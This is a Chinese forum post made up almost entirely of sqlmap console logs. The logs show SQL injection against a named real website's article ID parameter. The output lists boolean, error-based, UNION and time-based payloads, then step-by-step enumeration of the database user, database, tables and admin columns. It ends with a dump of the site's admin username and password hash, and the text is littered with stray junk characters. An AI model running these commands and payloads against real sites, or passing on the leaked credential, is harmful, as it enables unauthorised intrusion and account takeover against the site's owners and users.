找回密码
 立即注册
查看: 2698|回复: 0
打印 上一主题 下一主题

sqlmap实例注入mysql

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 22:18:49 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
2 A5 T  h+ Q3 R) U' b, x4 bms "Mysql" --current-user       /*  注解:获取当前用户名称/ `' q1 m3 l; z) r+ |( i# Z2 B
    sqlmap/0.9 - automatic SQL injection and database takeover tool
& L; r4 g3 J5 k' j( n+ j0 y  g    http://sqlmap.sourceforge.net
  • starting at: 16:53:54
    , z( n) Q  v8 E2 `$ y4 F[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    / f1 r  }$ B2 ~: b7 F session file$ {/ B8 q* ?5 V
    [16:53:54] [INFO] resuming injection data from session file
    / i3 a* {0 W* m! k4 p: L[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    ; i7 Y+ M) |3 }[16:53:54] [INFO] testing connection to the target url
    $ s# t0 I; b* l1 Csqlmap identified the following injection points with a total of 0 HTTP(s) reque
    4 x9 c% b# w) ?/ J4 S  Qsts:" F0 M! {5 [) \8 _* `1 F+ |9 }( r
    ---
    ; U" y  T9 K+ J* D" d( HPlace: GET
    8 b5 f* l4 U( X; j; s1 b7 CParameter: id& \7 Q. y+ S4 R
        Type: boolean-based blind' X, n* }4 F  Q) z. O; v/ g
        Title: AND boolean-based blind - WHERE or HAVING clause0 q* I' N( m) ^
        Payload: id=276 AND 799=799  T! V* `2 D( x( }
        Type: error-based0 n9 q! ^( \+ O( h
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause* O1 e, l" H" r+ A  }
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    2 ?" Z+ w$ I% E- j3 u* |120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    2 g1 p; y6 R; C" D! V7 i1 ^8 o),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)6 C2 \  A1 l1 C) k% L+ m! P* A
        Type: UNION query2 K& g( e7 T4 `. |+ H, z
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    * t4 ~: |% e; o" E3 x    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR$ h; q0 J9 J5 a  O/ m
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),4 g# G' y6 j# Z6 a# v  D+ Q. b
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#  ^, j- }/ U5 n8 V9 f$ v
        Type: AND/OR time-based blind5 m# b* f5 @" J
        Title: MySQL > 5.0.11 AND time-based blind  O6 S5 l( C7 g  N1 L$ X7 {' a
        Payload: id=276 AND SLEEP(5); E( n% z# O9 F7 U* y
    ---8 u1 l2 }- d3 Y0 ~* U* s* J, u
    [16:53:55] [INFO] the back-end DBMS is MySQL
    " H  o: B6 J: ]. ?web server operating system: Windows
    ' r, p+ y  V+ M( Y& \: [web application technology: Apache 2.2.11, PHP 5.3.0
    : o1 V- x6 l3 {1 sback-end DBMS: MySQL 5.0
    , g6 `1 {; S/ _" _5 Y2 i4 I[16:53:55] [INFO] fetching current user! p' v$ C' Q# e% g
    current user:    'root@localhost'   
    5 P$ a) c0 o# z0 w1 X  h+ r3 F[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    5 j1 @. B1 `( f/ Utput\www.wepost.com.hk'
  • shutting down at: 16:53:58
    & X5 o$ ]/ `1 d3 n6 o4 k! ^4 |2 {7 [0 o3 {
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    1 v& V0 F2 c5 Lms "Mysql" --current-db                  /*当前数据库, L4 [, D* a6 i* T
        sqlmap/0.9 - automatic SQL injection and database takeover tool! O  I7 s, C3 B! ?. o: z
        http://sqlmap.sourceforge.net
  • starting at: 16:54:162 r0 b. W$ ]  Z/ g
    [16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    1 h! d: e6 s% f7 w session file1 `  l/ o  v- T9 P6 Y
    [16:54:16] [INFO] resuming injection data from session file4 l; f; C! [  ]
    [16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    8 b* o! s0 O9 {9 H/ W5 ^/ W, K[16:54:16] [INFO] testing connection to the target url
    1 |9 \* e9 I! Q9 ~7 v) l; Rsqlmap identified the following injection points with a total of 0 HTTP(s) reque# ~* ]: b9 E3 l0 t8 b% _
    sts:
    : G7 w" A6 ]/ \. n1 C+ W8 M9 l---
      B1 o  K; v8 u" d7 `+ JPlace: GET9 R, Q; {) O3 z
    Parameter: id
    . m" S$ V% ~* t  S7 a    Type: boolean-based blind
    8 K' ~4 m- f+ B% I+ y9 ^; {8 Y    Title: AND boolean-based blind - WHERE or HAVING clause) `- T6 m; x) \& H9 f# Q$ n
        Payload: id=276 AND 799=799: m0 S+ _) h( X1 k! w; s2 [4 P
        Type: error-based$ ~( e5 w, E' v0 Y8 Y/ w! |$ I
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause: z3 p: d% y0 F2 g6 T: [
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    3 u+ Y5 h0 x: v* U* H120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58% Z: M- ?& X. e! p; {: ?
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)- p9 N. t( d6 I; k9 {; @
        Type: UNION query
    % G  a3 u" m) s. r& T+ y& j    Title: MySQL UNION query (NULL) - 1 to 10 columns3 n4 s( [/ \7 N0 Y$ P
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR$ Q8 h# j( L! R* j
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    / X" G! D- c  `  oCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    ' c1 A& \; x8 b    Type: AND/OR time-based blind9 X: r2 ?5 {$ _0 }3 h6 B+ P
        Title: MySQL > 5.0.11 AND time-based blind, f- e' q+ _& U, l7 q+ w! K4 K
        Payload: id=276 AND SLEEP(5)
    / m6 j+ P. k1 [2 p% r$ Y9 |---  c" S4 a) z' m  J! F) _
    [16:54:17] [INFO] the back-end DBMS is MySQL
    ! M" i; j# N0 u5 Iweb server operating system: Windows& f, ~) z) Q; c) `( A" ~
    web application technology: Apache 2.2.11, PHP 5.3.0$ \, m# Q* t' E' x/ Z
    back-end DBMS: MySQL 5.0! G% t9 m% o( }' C: F) S$ O* t
    [16:54:17] [INFO] fetching current database
      A# P4 N1 Y2 D5 F9 Dcurrent database:    'wepost'% |! H1 W5 k  H% e' c
    [16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou3 P  c  ]( |! A9 ?/ w
    tput\www.wepost.com.hk'
  • shutting down at: 16:54:18& F7 K9 Y" N! f! r6 v2 _
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db  _; T  `& k1 L: |
    ms "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名
      r( K* M# {, G8 o# o    sqlmap/0.9 - automatic SQL injection and database takeover tool3 P( q) I  X5 o0 ]* g, s
        http://sqlmap.sourceforge.net
  • starting at: 16:55:25
    - C( ~4 n  }" ]; O! k3 R+ x[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as6 \+ }7 U* |- Y
    session file; ~& P$ [) C& v" }3 X1 @# g/ D# h
    [16:55:25] [INFO] resuming injection data from session file
    : V( ?. D; |! X7 ^2 f* v$ U* {[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file' B) F  T& p( N% \3 J
    [16:55:25] [INFO] testing connection to the target url
    5 Y* ^7 Y0 z8 }4 _# asqlmap identified the following injection points with a total of 0 HTTP(s) reque# q3 L4 K6 e& I' a
    sts:. }) Y( N4 a' ]1 a6 `( z
    ---
    , i  j  l4 V. Z$ GPlace: GET& B9 Z  n; y) L
    Parameter: id4 W; n1 W, n3 o4 z$ z, P* @
        Type: boolean-based blind
    ' X% T1 G1 E: V- @7 w6 {1 N: s9 C. n    Title: AND boolean-based blind - WHERE or HAVING clause- d* Q8 ^% L) c$ _; x% F
        Payload: id=276 AND 799=799
    " }, T1 Q& t8 Y4 K8 Y) @    Type: error-based1 J5 R. G$ I0 Y
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause) f$ @5 w- }& z, t, e( F9 o& N
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    ) u' A" g# O4 k8 a0 K) H$ V, n120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    " U, f/ e9 t" C! p),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)/ }) \6 e7 k% d1 {. \
        Type: UNION query6 L, X$ n. h2 o+ J3 x6 D
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    ( i  e+ X$ }$ t5 p, G    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    ' z$ C) o  R0 N(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),7 L/ W! B" k) g
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#4 B4 e8 t) }5 q8 c3 w+ }) d
        Type: AND/OR time-based blind
    1 Z6 C& n/ Q9 b8 y7 f  ]9 ~    Title: MySQL > 5.0.11 AND time-based blind9 |2 {: n% n. S/ m
        Payload: id=276 AND SLEEP(5)( X0 v+ T. B5 z) T
    ---
    8 q; d* S3 [, d0 U% q[16:55:26] [INFO] the back-end DBMS is MySQL9 L: L" z3 |, _0 B1 _" u
    web server operating system: Windows( A. x7 |" i3 ]+ i# V) Q, E
    web application technology: Apache 2.2.11, PHP 5.3.0
    + W  K5 r& u: ^) I+ e( i$ @4 Fback-end DBMS: MySQL 5.0/ v$ f, @$ c' ]# y
    [16:55:26] [INFO] fetching tables for database 'wepost'% s4 C$ y+ W" J" A3 f
    [16:55:27] [INFO] the SQL query used returns 6 entries
    + F2 ]; w9 V0 Q4 e# ODatabase: wepost
    7 l6 z# U) N2 K; y[6 tables]
    * r+ i0 @$ j/ ]+ H- n+-------------+( v2 g. t1 Y2 W: O
    | admin       |
    6 b7 n& a+ \3 _, p| article     |
    ( S" I* u- O5 a; z- r7 d9 u| contributor |' G( c4 J' ?$ m  {  S
    | idea        |9 i/ r/ l4 x  v0 k, S; _
    | image       |
    % w+ T8 W0 O6 k9 S  B* W& _| issue       |
    6 V3 Q' |3 n- M  z+-------------+
      g4 z6 N: W* m6 _  i1 V[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou1 j+ ?8 L$ B1 [9 _
    tput\www.wepost.com.hk'
  • shutting down at: 16:55:33
    4 v6 h1 v4 W: J, h4 C, A0 J3 J* u& Q$ X1 r6 o, L! w
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    , q4 z# R( S1 s% B' mms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名- M8 b. ~8 i1 ]- p! X2 D' p) P
        sqlmap/0.9 - automatic SQL injection and database takeover tool, U4 v1 M7 V9 W! N+ q, l
        http://sqlmap.sourceforge.net
  • starting at: 16:56:06( t2 [7 k2 H/ w' l+ u
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    5 j# G2 p" H! m2 [$ X: ^# W: Csts:
    , ?) g/ K9 {; M1 b' L) [2 ]' X---
    7 I- e: T1 |: ^  o- W6 aPlace: GET, G9 f3 Y! A& ~. F
    Parameter: id  Y1 v0 i, t0 \; ], E8 n- t
        Type: boolean-based blind" G( c) o4 F2 v, c8 N
        Title: AND boolean-based blind - WHERE or HAVING clause
    ( W0 l8 s3 r8 I$ B7 Y  C& s3 [8 q    Payload: id=276 AND 799=799. ]# Z  i# S) b
        Type: error-based0 ~5 ^! X, N$ [; x$ G
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    1 I* q/ W/ C: ?* k! H    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,4 b6 v1 ?1 u: J2 C& L. H
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58' Y6 W# z/ J# V! y" p8 X) b
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)5 K+ x0 h$ ~$ Q; j4 b& E
        Type: UNION query
    5 W2 O7 k' g9 v    Title: MySQL UNION query (NULL) - 1 to 10 columns
    2 D1 @7 Z8 H9 H6 {3 G8 ^    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR+ @& z6 B2 b/ x, y. f  x" A
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    - W4 W8 Z# j' U$ M* {4 ZCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#4 ?) N% J, W$ T
        Type: AND/OR time-based blind- s" Q  {  r. V7 J, ~! g
        Title: MySQL > 5.0.11 AND time-based blind
    . J+ z9 ?. p! ?( o3 \6 C    Payload: id=276 AND SLEEP(5)
    1 s; D8 Q2 p5 ~6 x---0 o8 d' J9 `2 p& r
    web server operating system: Windows, M- o, B) B- S' ?! g: h
    web application technology: Apache 2.2.11, PHP 5.3.0
      \6 [: ?  j- b! Q- I6 m- Jback-end DBMS: MySQL 5.0
      g6 C- Z- b0 l" f[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se$ z/ [& B) M/ r0 y( L. ^1 [' n
    ssion': wepost, wepost- w- Y& p8 o% v) W5 v& t! _8 e
    Database: wepost
    1 h7 q) ]# h8 c6 z- F! l% k. QTable: admin9 z, |5 U6 h; a. w# {. z; j
    [4 columns]
    : I6 ^' w; N; i$ |0 x; j+----------+-------------+* i) S) L+ W3 }, p  Q+ M* G( t
    | Column   | Type        |
    & M. \2 c8 V) N) r  P+----------+-------------+
    ) s( I+ G2 j( v$ I# [9 y1 L- a" B| id       | int(11)     |
    ; J2 z5 y. W$ Q| password | varchar(32) |, _+ P# A) M: p- E2 F* t* Q7 T) S
    | type     | varchar(10) |
    # `4 d+ V3 R( Z. ]' A| userid   | varchar(20) |
    " Z2 d/ Z' R" E+----------+-------------+) t/ W8 n/ d4 }& n8 V
  • shutting down at: 16:56:19' |1 a# B2 h2 \

    ' _7 u( F9 I9 G6 R: UD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db; p7 V( {7 f9 W3 ^& u
    ms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容* `  Z, ~% T3 B; A% H
        sqlmap/0.9 - automatic SQL injection and database takeover tool
    ( N; V1 E; z" M( b  ~7 u4 t0 u! j1 C    http://sqlmap.sourceforge.net
  • starting at: 16:57:14
    0 n) M; {" ~# dsqlmap identified the following injection points with a total of 0 HTTP(s) reque
    / k, X9 o- _! M  j4 r- q% qsts:' C3 n0 S, ^4 f9 n* @& o% e* c
    ---% F/ _: @! W3 k$ c
    Place: GET
    0 g0 d/ G, w3 ^1 x) @: L1 \Parameter: id
    4 {4 G8 r- ~7 R$ _- g    Type: boolean-based blind; L% T' W' u2 v+ _9 o6 R% H; B$ K
        Title: AND boolean-based blind - WHERE or HAVING clause. X( S( R! p% p2 x4 j
        Payload: id=276 AND 799=799! h1 v0 _/ c2 N% c- x7 {
        Type: error-based
    + T. u1 h# M& r; z3 j    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    , Z$ _8 M: A* Y* v2 y4 T2 _" s; j    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,3 B( @1 r0 v6 ^
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    8 S8 F; g  E$ H% v, r" y& [3 l),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)9 _) m4 E3 V/ Y4 D0 a" c
        Type: UNION query  Y" T( s$ L4 o) s4 F2 N( \  ~
        Title: MySQL UNION query (NULL) - 1 to 10 columns' x! e* |6 b& {9 ~( O5 g; n
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    * K4 s( Y, o+ n3 A5 ~' I(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),- y" c+ L* H/ ~; _2 v
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#; U! n1 u% T/ N& e
        Type: AND/OR time-based blind
    + T  m1 x) ?8 f+ n, o' `& x    Title: MySQL > 5.0.11 AND time-based blind6 b7 v2 S3 ^+ G# i: `
        Payload: id=276 AND SLEEP(5)
    3 j3 m+ @0 C8 d, x---
    $ j& N5 v5 t1 g5 n& Qweb server operating system: Windows+ u0 h8 x9 N, Q$ J
    web application technology: Apache 2.2.11, PHP 5.3.0
    $ l) H8 p' t' X, M: E/ ?7 H- S( G2 Qback-end DBMS: MySQL 5.0+ I& ?8 U! P! f. H) g& f
    recognized possible password hash values. do you want to use dictionary attack o
    5 ~3 t6 B( J3 F# An retrieved table items? [Y/n/q] y( ^+ }$ S0 R9 g4 M* \
    what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]  h0 x6 L3 L& l: t7 ]! _
    do you want to use common password suffixes? (slow!) [y/N] y
    7 ]7 z2 l9 |8 l, S9 k8 l; VDatabase: wepost
    1 W3 T# T" U1 x# ?Table: admin$ u4 G! v% @- U1 E
    [1 entry]
    / c3 A2 k' s8 @, Q+ y' x+ B/ {+----------------------------------+------------+
    ! l- w! u! N" y/ z& U# s| password                         | userid     |% {' i7 U4 i' C/ p4 ?
    +----------------------------------+------------+
    3 s. |" V$ r* h; ^/ k| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
    : ~+ k+ }5 R! `5 ^3 ~( G+----------------------------------+------------+# G! D" E2 Z$ i$ k) ?4 u5 N
  • shutting down at: 16:58:14( e# o& K4 S4 R$ P( @
    + v0 ?3 G1 R5 I# e: @& y% y& k. e
    D:\Python27\sqlmap>
  • 回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    快速回复 返回顶部 返回列表